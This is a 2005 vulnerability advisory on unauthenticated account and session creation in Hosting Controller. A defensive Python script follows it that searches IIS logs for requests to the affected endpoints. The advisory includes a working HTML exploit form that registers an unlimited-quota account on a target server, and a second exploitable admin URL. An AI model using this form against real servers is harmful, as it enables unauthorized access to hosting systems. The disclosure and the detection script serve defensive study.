-= KeHieuHoc - HCE GROUP =-

Information
-------------------------
Software Package    : Hosting Controller
Vendor Homepage     : http://www.hostingcontroller.com
Platforms           : Windows based servers
Vulnerability       : Multiple unauthenticated information disclosure
Risk                : high
Vulnerable Versions : All versions ( Tested on: v.6.1 Hotfix 2.1 )
Vendor Contacted    : 09/07/2005
Release Date        : 11/07/2005

Summary
------------
Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform.

(I) You can create a new account on Hosting Controller

Exploit :
http://[target]/admin/hosting/addsubsite_online.asp

Code Form:

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM>

(II) You can create any "session" that is special to the system owner

Exploit :
http://[target]/admin/hosting/dsp_newreseller.asp

(I) and (II) -> have fun

Solution
----------
The vendor was notified and has released a patch. Update your software.

Credits
---------
Discovered on 9 July 2005 by KeHieuHoc - HCE Group
Email: kehieuhoc@xxxxxxxxx

References
-------------
http://hcegroup.net

------------------------------
// KeHieuHoc - HCE Group \\
------------------------------
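
A log-review check for the two endpoints named above, as an added example that is not part of the original advisory: it scans IIS W3C extended logs for requests to those paths and groups them by client address. The sample log lines and IP addresses are constructed, and the function name find_hits is hypothetical.

```python
from collections import defaultdict

# Endpoints named in the advisory; IIS treats paths case-insensitively.
WATCHED = {
    "/admin/hosting/addsubsite_online.asp",
    "/admin/hosting/dsp_newreseller.asp",
}

def find_hits(lines):
    """Return {client_ip: [(date, time, method, path, status), ...]}."""
    fields = []
    hits = defaultdict(list)
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            # Column order is set per log file by this directive.
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed row
        row = dict(zip(fields, values))
        path = row.get("cs-uri-stem", "").lower()
        if path in WATCHED:
            hits[row.get("c-ip", "?")].append((
                row.get("date", "-"), row.get("time", "-"),
                row.get("cs-method", "-"), path, row.get("sc-status", "-"),
            ))
    return dict(hits)

# Constructed sample log (documentation-range IPs), not from a real server.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-07-10 08:14:02 192.0.2.10 GET /index.htm - 200
2005-07-10 08:15:40 198.51.100.7 POST /admin/hosting/AddSubSite_Online.asp - 200
2005-07-10 08:16:05 198.51.100.7 GET /admin/hosting/dsp_newreseller.asp - 200
2005-07-10 08:20:11 192.0.2.10 GET /images/logo.gif - 304
"""

if __name__ == "__main__":
    for ip, rows in find_hits(SAMPLE_LOG.splitlines()).items():
        for r in rows:
            print(ip, *r)
```

Any hit returned for a server that was running an unpatched version is worth checking against the accounts and resellers created around the same timestamp.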